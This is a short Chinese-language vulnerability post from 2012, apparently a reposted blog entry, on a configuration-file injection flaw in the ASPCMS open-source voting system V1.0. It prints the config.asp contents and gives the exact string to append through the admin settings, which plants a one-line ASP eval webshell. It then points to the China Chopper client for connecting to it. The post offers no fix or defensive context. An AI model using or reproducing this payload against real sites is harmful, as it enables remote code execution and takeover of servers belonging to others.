发布日期:2012-12-12
发布作者:月末
漏洞类型:设计错误
漏洞描述:后台配置文件采用文件写入,未严格过滤导致插入一句话木马。
config.asp内容
- <%Const SiteName="ASPCMS 开源投票系统 V1.0" Const ks="0" Const xxps="1" Const kssm="投票已关闭,更多信息请登录http://www.aspcms.com" Const gz="3" Const glsj="" Const Copyright="Copyright 2006-2011 上谷网络 版权所有(底部信息,可在后台网站基本设置修改)" %>
在末尾加上
“%><%eval request(“c”)%>
菜刀连接:
今天的文章aspcms投票系统后台插马漏洞分享到此就结束了,感谢您的阅读,如果确实帮到您,您可以动动手指转发给其他人。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/32799.html